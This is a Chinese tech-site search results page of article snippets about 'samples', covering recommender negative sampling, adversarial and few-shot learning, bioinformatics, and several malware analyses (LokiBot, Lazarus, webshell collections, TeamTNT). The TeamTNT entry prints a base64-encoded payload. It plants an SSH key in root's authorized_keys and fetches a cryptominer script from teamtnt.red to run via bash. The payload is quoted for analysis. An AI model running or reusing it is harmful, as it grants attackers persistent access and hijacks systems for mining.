首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏炼丹笔记

    推荐系统炼丹笔记7:负样本的艺术

    目前,在清洗数据构造正负样本时,由于日志的延迟上报问题,在点击事件的问题中构造样本时,往往会出现将曝光未点击数据误以为是负样本的情况,可真实的负样本真的是这样吗? 本文作为 推荐系统炼丹笔记系列的第7期,我们在样本构造方面,来聊一聊负样本的艺术。 “数据和特征决定了机器学习的上限,而模型和算法只是逼近这个上限”。 01曝光未点击负样本 在召回阶段,我们可以常会沿用排序阶段的思路,使用曝光且点击的为正样本,曝光未点击的为负样本。 Facebook在论文中尝试了两种Hard样本挖掘的方法:Hard负样本挖掘和Hard正样本挖掘。 Hard正样本挖掘 正样本选择相关度最高的,即用户点击过的样本和相似度高的潜在正样本作为Hard正样本。 这里做法和百度的Mobius中的做法很是相似了。

    5.8K30编辑于 2021-12-22
  • 来自专栏机器之心

    7 papers | 对抗样本前,BERT也不行;AutoML的商业实践综述

    这说明,针对这种线索,可以提出一种对抗样本数据集,可以使所有语言模型的性能下降到几乎随机。论文提出了这种针对观点理解任务鲁棒性的对抗样本数据集。 ? 观点阅读理解任务对抗样本数据集。 左:原始数据;右:对抗样本。 ? BERT-Large 模型的在对抗样本数据集的表现,效果相当于随机。 推荐:BERT 模型真的那么神奇吗?也许从数据集角度分析,再好的预训练模型也不过是统计拟合。 具体来说,他们试验了 2018 年顶级科研会议上提出的 18 种算法,但遗憾的是,仅有 7 种算法可以通过研究人员的合理努力实现复现。 然而,在这 7 种算法之中,却又有 6 种算法的效果通常弱于同类更简单的启发式方法,如基于最近邻或基于图的方法。 7.

    81520发布于 2019-07-24
  • 来自专栏单细胞学习小组

    day7 GEO下载多样本数据的聚类注释

    ifelse 函数 :根据逻辑值是T还是F产生不同的值数据获取+文件名修改数据来自GEO的GSE231920,有3个treat,3个control样本全部下载并解压untar("GSE231920_RAW.tar ",exdir = "GSE231920_RAW") #解包改名 利用lapply套自定义函数实现了批量操作为每个样本创建单独的文件夹把每个样本的三个文件复制进去所有文件改名,去掉前缀library(stringr nCount_RNA < 40000 & nFeature_RNA < 6000)table(sce.all@meta.data$orig.ident)降维聚类,多样本使用 可以看看去除样本间批次效应的效果如何注释library(celldex)library(SingleR)f = "../day5-6/ref_BlueprintEncode.RData"if(! 组间比较气泡图,把感兴趣的基因进行markers.to.plot = c("CD3D", "CREM", "HSPH1", "SELL", "GIMAP5", "CACYBP", "GNLY", "NKG7"

    41010编辑于 2024-07-01
  • 来自专栏MyBlog

    利用误分类样本来防御对抗样本

    作者首先讲正确分类的样本集合记做 ? ,误分类的样本集合记做 ? 。统一使用对抗训练进行防御,分别只对 ? 和 ? 进行扰动,以及两者均进行扰动,比较这三者的对抗鲁棒性。 这里的扰动,指的就是生成对应的对抗样本加入到训练集合中 对抗鲁棒性指的是,在对抗样本作为输入时,模型的精度 ? 首先作者改变了扰动的方法,将PGD切换成FGSM,分别单独作用于两个样本集合中,从最终的结果上看,仍然是对误分类样本扰动对鲁棒性的提升比较明显,如下图所示: ? (反之,如果模型对于对抗样本和正常样本的输出分布类似,鲁棒性越高?) 然后我们看蓝色虚线(BCE[以扰动样本作为输入]+KL散度)和绿色线(BCE[以普通样本作为输入]+KL散度),说明基础的精度那一项的输入还是扰动样本要优。 KL项的系数 ?

    86610发布于 2021-03-16
  • 来自专栏DeepHub IMBA

    样本和少样本学习

    而·少样本学习的思想是通过比较数据来学习区分类,这样模型使用的数据更少,并且比经典模型表现得更好。在少样本学习中通常会使用支持集(support set)代替训练集。 少样本学习是一种元学习技术。 K-Way N-Shot支持集:支持集具有K类,每个类都有N样本。N-Shot意味着为每个类提供的样本数。如果每个另类都有更多样本,模型可以学习的更好。 孪生网络 孪生网络使用正面和负样本进行分类。 通过比较这样就得到了我们的预测分类 单样本学习 one-shot learning是少样本学习的一种特殊情况,即从一个样本学习并再次识别物体。 从监督到零样本的模式识别 我们以前在经典的分类模型中的做法是这样的: 但当出现新的类别时,该怎么做呢?关键是零样本学习。零样本学习的主要思想是将类别嵌入为向量。

    1.3K20编辑于 2022-11-11
  • 来自专栏生信喵实验柴

    临床样本检测

    metagenomics on a nanopore)为封面,刊登了英国东安格利亚大学 Justin O'Grady 博士及合作者共同发布的首个使用纳米孔技术的快速、经济的宏基因组测序方法,直接从患者呼吸道样本中准确快速地识别细菌病原体 据悉,为了能够准确、快速地识别细菌病原体,研究团队开发了一种能够从临床样本中去除多达 99.99%的宿主核酸的流程,并在便携式 MinION 测序仪上开展了实时的检测和分析。 二、下载数据 https://www.ebi.ac.uk/ena/browser/view/PRJEB30781 三、病原微生物鉴定 3.1单个样本 过滤宿主序列 #数据路径 #/data

    78120编辑于 2023-02-24
  • 来自专栏python3

    Python练手,样本

    [i] * 200 + edu[i] * 1000 + ( lvl[i] - 1 ) * 3000 + sex[i] * 1000 \                           + i % 7 

    57030发布于 2020-01-13
  • 来自专栏SimpleAI

    样本,事半功倍:使用样本设计工程 (SDE) 来构造更好的大模型下游微调样本

    本研究表明,细致地考虑大模型微调样本的设计,可以使用更少的样本训练出在下游任务上表现更好的模型。 模型: 我们为了探究样本设计是否在不同LLMs上存在差异/一致性,我们采用了3个系列的 6 种被广泛使用的开源模型: Chinese-LLaMA2:使用了 7B 大小的 chat 和 base 两个版本 ,分别记为 c-llama2-chat 和 c-llama2-base; InternLM:使用了 7B 大小的 chat 和 base 两个版本,分别记为 intern-chat 和 intern-base ; Baichuan2:使用了 7B 大小的 chat 和 base 两个版本,分别记为 bc2-chat 和 bc2-base; 模型微调均采用 LoRA 参数高效微调技术,其他微调方法均可使用。 对于GENIA和MAVEN两个英文数据集,我们采用 LLaMA2-7B-Chat 进行实验,对于 Review11 中文数据集,我们采用近期刚发布的性能强大的 Qwen1.5-4B-Chat 进行实验。

    89621编辑于 2024-04-26
  • 来自专栏机器之心

    7 Papers & Radios | 南加大游戏AI玩转《毁灭战士》;少样本NLP元学习综述

    机器之心 & ArXiv Weekly Radiostation 参与:杜伟、楚航、罗若天 本周的重要论文有南加大开发的玩转《毁灭战士》游戏的 AI 智能体,以及Salesforce 研究者的少样本 NLP Kwok 论文链接:https://arxiv.org/abs/1911.02377 摘要:样本选择(sample selection)是噪声标签鲁棒学习的常用方法。 具体而言,本文力图对少样本 NLP 中元学习的应用提供更清晰的定义,对新进展进行了总结,并分析了一些常用的数据集。 ? 多任务学习 VS 元学习。 ? Choi) 7. Will Your Forthcoming Book be Successful? (from Jian Sun) 7. WeightNet: Revisiting the Design Space of Weight Networks.

    49340发布于 2020-07-28
  • 来自专栏红队蓝军

    lokibot样本分析

    temp文件夹下创建vxogkynyop文件图片向文件中写入加密的代码图片此加密代码解密后是一段shellcode 用于解密核心PE文件的还会再temp文件夹下创建wdxw2bfd6vcc5n文件 此文件为样本的核心代码 解密后的数据是PE文件 解密算法就在vxogkynyop文件中图片在临时文件夹下创建frhdgr.exe文件 向文件中写入PE文件创建进程 进程参数就是vxogkynyop文件图片提取样本图片第二层代码 2.03.04.文件的后缀5.CSIDL :26 通过SHGetFolderPathW函数获取C:\Program Files目录6.值为1说明下载的是dll文件 值为0 会执行创建进程或者打开网页等操作7.

    55920编辑于 2023-09-13
  • 来自专栏Khan安全团队

    Dangerouspassword ( Lazarus ) APT样本

    URL: hXXps://open.googlesheetpage.org/KcyRbGDJKRZoaLq8lHh8/C0sHwcGMH2/jnobmAFCMoY=

    54920编辑于 2022-04-02
  • 来自专栏学习与分享

    【Prometheus】Prometheus的样本

    在 Prometheus 中,"样本"(Sample)是指时间序列数据的一个基本单位,包含了某个特定时刻的一个度量值。一个样本由以下几部分组成: 1. 7. Prometheus 样本的类型 Prometheus 支持多种度量类型,它们定义了样本值的含义和如何增长: Counter(计数器):计数器值只能增加,表示某个事件的累计发生次数(例如 HTTP 请求总数 示例:不同类型的样本 1. Gauge 样本 cpu_usage{job="api-server", instance="server1"} 0.75 这个样本表示 cpu_usage(CPU 使用率)为 0.75,即 75%。

    61210编辑于 2024-12-18
  • 来自专栏CV学习史

    样本学习介绍

    形式化来说,few-shot 的训练集中包含了很多的类别,每个类别中有多个样本。 (batch)样本作为模型的预测对象(batch set)。 如果K值很小(通常K<10),我们称这种分类任务为极少样本分类任务(当K=1时,变成单样本分类任务)。 为了清楚起见,让我们详细说明度量学习算法是如何解决少样本分类任务的(以下定义为带标签样本的支持集,以及我们要分类的查询图像集): 我们从支持集和查询集的所有图像中提取特征(通常使用卷积神经网络)。 在元训练期间,MAML学习初始化参数,这些参数允许模型快速有效地适应新的少样本任务,其中这个任务有着新的、未知的类别。 MAML目前在流行的少样本图像分类基准测试中的效果不如度量学习算法。

    2.1K21发布于 2019-09-05
  • 来自专栏Bypass

    Webshell 高级样本收集

    收集样本,那可是一件很有趣的精细活。从样本里,你可能会发现很多技巧,并进入另一个视角来领略攻击者的手法。 当在安全社区里看到一些比较高级的Webshell样本,就如同发现宝藏一般欣喜,我会把它保存起来,慢慢地收集了大量的Webshell样本。 什么情况下需要海量的Webshell样本呢? 最近,我就在做产品Webshell扫描检测率方面的测试工作,以前积累下来的Webshell武器库给我的工作带来了极大的便利,通过去分类归整,同时整合了网络上的一些资源,形成一个测试样本库。 ---- 1、JSP高级对抗样本 这个一个可能会改变你对JSP Webshell认知的项目,提供了18个JSP高级样本具有很高的研究价值。 https://github.com/xl7dev/WebShell https://github.com/tanjiti/webshellSample https://github.com/webshellpub

    1.2K10发布于 2020-08-02
  • 来自专栏红队蓝军

    lokibot样本分析

    文件夹下创建vxogkynyop文件 向文件中写入加密的代码 此加密代码解密后是一段shellcode 用于解密核心PE文件的 还会再temp文件夹下创建wdxw2bfd6vcc5n文件 此文件为样本的核心代码 解密后的数据是PE文件 解密算法就在vxogkynyop文件中 在临时文件夹下创建frhdgr.exe文件 向文件中写入PE文件 创建进程 进程参数就是vxogkynyop文件 提取样本 第二层代码 4.文件的后缀 5.CSIDL :26 通过SHGetFolderPathW函数获取C:\Program Files目录 6.值为1说明下载的是dll文件 值为0 会执行创建进程或者打开网页等操作 7.

    47820编辑于 2023-09-05
  • 来自专栏R语言及实用科研软件

    🧐 pwr | 谁说样本量计算是个老大难问题!?(三)(配对样本与非等比样本篇)

    1写在前面 之前我们介绍的基于发生率或者均值进行样本量计算的方法,但都是在组间进行计算。 有的时候我们需要获取组内变化,进行样本量计算。 常见的就是配对样本,比如相同受试者进行多个时间点的观察,如下图: 本期我们就介绍一下如何估算配对样本样本量吧。 ---- 4.2 pwr计算样本量 现在,我们可以利用pwr包计算节食前后平均体重变化差(5磅)所需的样本量,具有 80%的power和0.05的显著性。 power, type = "b", xlab = "Cohen's d_z", ylab = "Power (%)", xlim = c(0, 2)) 7不等比样本量的 解决这个问题的唯一方法是招募更多患者或通过放宽纳入标准来扩大样本量。

    1.3K20编辑于 2023-02-24
  • 对话系统中零样本与少样本学习技术解析

    获奖论文《面向任务型对话系统的零样本与少样本知识寻求轮次检测》由应用科学家Di Jin、Shuyang Gao、首席应用科学家Seokhwan Kim、Yang Liu以及高级首席科学家Dilek Hakkani-Tür 但这需要大量正负样本,而开放域对话系统允许用户提出任意问题,难以收集足够数量的域外样本。" 性能优势实验结果显示:REDE模型在低资源和高资源设置下,对标准请求和域外请求的性能均优于传统二元分类器在零样本和少样本场景中,REDE模型相比BERT等传统分类器获得更大性能优势技术价值Seokhwan

    15210编辑于 2025-10-07
  • 来自专栏拓端tecdat

    R语言参数检验 :需要多少样本?如何选择样本数量

    例如,t检验是众所周知的参数检验,假设样本均值具有正态分布。由于中心极限定理,如果样本量足够,测试也可以应用于非正态分布的测量。在这里,我们将研究t检验有效所需的大致样本数。 将正态分布拟合到采样均值 为了研究满足t检验要求所需的样本数量,我们迭代各种样本量。对于每个样本大小,我们从几个分布中抽取样本。然后,计算样本的平均值,并将正态分布拟合到平均值的分布。 84.44694 -117.56140 -3427.721 ## 6 100 1397.7265 443.81523 281.68706 47.87537 -2178.871 ## 7 验证对数似然标准 作为结果的验证,让我们绘制样本大小为5的直方图和平均分布变为正常的样本大小: ? plot.means(norm.means) 这些结果表明对数似然准则是正态性的充分代理。 结论 这些实验的结果表明,对于小于20的样本,绝对应该避免学生t检验。当样本量至少为100时,大多数分布似乎都满足了测试的假设。 总之,特别建议检查样本大小低于100的测量分布。

    92810发布于 2020-11-11
  • 来自专栏Bypass

    恶意样本基础分析技巧

    本文主要通过几个简单的步骤,分享恶意样本分析的基本方法。 ---- 1、多引擎在线病毒扫描 找到了一个恶意样本程序,通过多病毒引擎进行安全扫描,可以帮助你判断文件是否为恶意程序。 2、文件哈希值 文件哈希值是恶意代码的指纹,通过它用来确认文件是否被篡改,也可以通过HASH值查找恶意样本,一般我们也可以使用多种哈希验证文件的唯一性。 ? 6、云沙箱分析 将恶意样本上传到微步云沙箱,通过威胁情报、静态和动态行为分析,以发现恶意程序存在的异常。 微步云沙箱: https://s.threatbook.cn/ ? 7、动态行为分析 通过火绒剑对文件行为、注册表行为、进程行为、网络行为进行分析,捕获恶意样本特征。 ?

    2.8K20发布于 2021-07-22
  • 来自专栏云鼎实验室的专栏

    TeamTNT 样本新变种分析

    样本属于最新版本TEAMTNT样本,云鼎实验室哨兵系统第一时间捕获,本文会详细分析样本在入侵,持久化,容器逃逸等多个方面所使用的技术,并对应到ATT&CK矩阵。 二、样本产生时间与流行分析 样本的开发时间大约在2021年09月14日编写完毕,云鼎实验室哨兵系统在9月14号第一时间捕获,并进行了详细的分析。 哨兵捕获的网络包: 样本流行程度: 通过哨兵智能情报统计系统,样本在刚刚爆发的2周内较为流行,随后感染率持续下降。 三、样本att&ck矩阵分析 TEAMTNT的新样本通过docker remote API 传播,过程中使用了 特权容器,容器逃逸,LKM rootkit 等先进攻击方式,下面是对于整个攻击过程的att echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKCmNoYXR0ciAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IHRudHJlY2h0IC1SIC1pYSAvcm9vdC8uc3NoLyAyPi9kZXYvbnVsbDsgaWNoZGFyZiAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGwKY2F0IC90bXAvVGVhbVROVC5wdWIgPj4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMKY2F0IC90bXAvVGVhbVROVC5wdWIgPiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5czIKcm0gLWYgL3RtcC9UZWFtVE5ULnB1YgoKCnNzaCAtb1N0cmljdEhvc3RLZXlDaGVja2luZz1ubyAtb0JhdGNoTW9kZT15ZXMgLW9Db25uZWN0VGltZW91dD01IC1pIC90bXAvVGVhbVROVCByb290QDEyNy4wLjAuMSAiKGN1cmwgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHxjZDEgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHx3Z2V0IC1xIC1PLSBodHRwOi8vdGVhbXRudC5yZWQvc2gvc2V0dXAvbW9uZXJvb2NlYW5fbWluZXIuc2h8fHdkMSAtcSAtTy0gaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNoKXxiYXNoIgoKcm0gLWYgL3RtcC9UZWFtVE5UCgo

    2.1K30发布于 2021-10-19
领券